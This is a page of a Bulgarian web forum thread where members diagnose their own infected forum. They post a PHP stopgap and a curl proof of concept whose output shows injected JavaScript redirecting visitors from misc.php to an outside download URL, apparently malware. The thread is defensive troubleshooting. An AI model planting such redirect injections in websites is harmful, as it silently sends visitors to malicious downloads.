Страница 2 от 2 ПърваПърва 1 2
Резултати 26 до 37 от 37

Тема: ФОрума е заразен , почистете го най-накрая

  1. #26

    Членува от
    Jan 2014
    Адрес
    София
    Възраст
    44
    Мнения
    204
    Виждам един със спряла кола на пътя с вдигнат капак. Спирам и го питам какво става и дали иска да го дръпна до близката бензиностанция, да не дреме там в нищото. Оня ми вика колата е служебна и трябва да звънна на шефа му, за да ми даде да го дърпам! Продължих си по пътя. А после и дъжд заваля ...

    • #0
      Реклама от Google Реклама от Google
      Членува от
      Dec 2007
      Адрес
      Google.com

        
       

  2. #27
    Moderator L.K.'s Avatar
    Членува от
    Nov 2010
    Адрес
    Казанлък
    Възраст
    52
    Мнения
    14,380
    Същестеуват и други гледни точки.

  3. #28
    Както винаги, истината е по средата. От една страна е разбираемо, че меко казано не е редно администрацията на форума да се дава на човек който не се ползва с доверието на собствениците му.
    От друга, предложена е помощ, но чак пък да се натиска някой за подобно нещо, също не е редно, а и както отбеляза peachlover, ще започне да става подозрително.

    Това вмятане на Румен за "преглъщане на достойнството" го приемам по-скоро за неправилно подбрани изразни средства...

    Дано все пак администрацията и предложилия помощ да намерят общ език и да решат проблема.
    Учените са открили, че 90% от хората са симулирали еволюцията.

  4. #29
    Moderator L.K.'s Avatar
    Членува от
    Nov 2010
    Адрес
    Казанлък
    Възраст
    52
    Мнения
    14,380
    И аз смятам, че Любителят на праскови и администрацията ще намерят общ език. След като не можем да им помогнем в това начинание по-добре е да не им пречим.

  5. #30
    добавете
    PHP Code:
    if($_GET['js']=='js') die; 
    в началото на misc.php и ще спре да редиректва.

  6. #31

    POC

    Ето и Proof of Concept, който оправдава предложението да се филтрират GET заявки към misc.php с Parameter js=js

    Код:
    peach@peach:/home/peach# curl -Lv --silent --referer "https://bgaudioclub.org/" -b "bb_lastvisit=1540298351;" -A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "https://bgaudioclub.org/misc.php?v=424&js=js" 
    *   Trying 81.4.124.16...
    * Connected to bgaudioclub.org (81.4.124.16) port 443 (#0)
    * found 149 certificates in /etc/ssl/certs/ca-certificates.crt
    * found 608 certificates in /etc/ssl/certs
    * ALPN, offering http/1.1
    * SSL connection using TLS1.2 / ECDHE_RSA_AES_256_GCM_SHA384
    *      server certificate verification OK
    *      server certificate status verification SKIPPED
    *      common name: bgaudioclub.org (matched)
    *      server certificate expiration date OK
    *      server certificate activation date OK
    *      certificate public key: RSA
    *      certificate version: #3
    *      subject: CN=bgaudioclub.org
    *      start date: Mon, 17 Sep 2018 10:07:32 GMT
    *      expire date: Sun, 16 Dec 2018 10:07:32 GMT
    *      issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
    *      compression: NULL
    * ALPN, server did not agree to a protocol
    > GET /misc.php?v=424&js=js HTTP/1.1
    > Host: bgaudioclub.org
    > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
    > Accept: */*
    > Referer: https://bgaudioclub.org/
    > Cookie: bb_lastvisit=1540298351;
    > 
    < HTTP/1.1 200 OK
    < Date: Tue, 23 Oct 2018 14:36:15 GMT
    < Server: Apache/2.4.7 (Ubuntu)
    < X-Powered-By: PHP/5.5.9-1ubuntu4.5
    < Set-Cookie: bb_lastvisit=1540298351; expires=Wed, 23-Oct-2019 14:36:15 GMT; Max-Age=31536000; path=/; secure
    < Set-Cookie: bb_lastactivity=0; expires=Wed, 23-Oct-2019 14:36:15 GMT; Max-Age=31536000; path=/; secure
    < Set-Cookie: bb_lang_id=en; expires=Wed, 24-Oct-2018 00:36:15 GMT; Max-Age=36000
    < Content-Length: 67
    < Content-Type: text/html
    < 
    * Connection #0 to host bgaudioclub.org left intact
    document.location='http://myfilestore.com/download.php?id=66193113'

  7. #32
    Rumb@ta's Avatar
    Членува от
    Apr 2011
    Адрес
    Пловдив
    Възраст
    40
    Мнения
    1,661
    Супер! Дано DAY види поста ти.
    The difference between genius and stupidity is that genius have it's limits.

  8. #33
    Говорих с него, говорих и с Ангел днес. Ще станат нещата. Просто ако се окаже, че човек с достъп чете темата - да става по-бързо. Пък и по телефона ми е трудно да предам 40 реда аутпут.

  9. #34
    Rumb@ta's Avatar
    Членува от
    Apr 2011
    Адрес
    Пловдив
    Възраст
    40
    Мнения
    1,661
    Готово! Влязох през Гугъл. Сега може ли да пуснете да има нови регистрации?
    The difference between genius and stupidity is that genius have it's limits.

  10. #35
    Цитат Публикувано от Rumb@ta Покажи мнения
    Готово! Влязох през Гугъл. Сега може ли да пуснете да има нови регистрации?
    То не е оправено още.

  11. #36
    Rumb@ta's Avatar
    Членува от
    Apr 2011
    Адрес
    Пловдив
    Възраст
    40
    Мнения
    1,661
    Дам... Първият път пренасочва, а втория и следващи си влиза и за това съм се объркал. Сори!
    The difference between genius and stupidity is that genius have it's limits.

  12. #37
    Цитат Публикувано от Rumb@ta Покажи мнения
    Дам... Първият път пренасочва, а втория и следващи си влиза и за това съм се объркал. Сори!
    Аз за това съм дал curl команда с която може да се проверява всеки път и да не разчитаме на случайности. Върне ли myfilestore - не е добре

Страница 2 от 2 ПърваПърва 1 2

Права за публикуване

  • Вие не можете да започвате нова тема
  • Вие не можете да отговаряте в тема
  • Вие не можете да прикачвате към мненията си
  • Вие не можете да редактирате мненията си
  •  
  • BB кодове са Включени
  • Smilies са Включени
  • [IMG] кодове са Включени
  • [VIDEO] code is Включени
  • HTML кодове са Изключени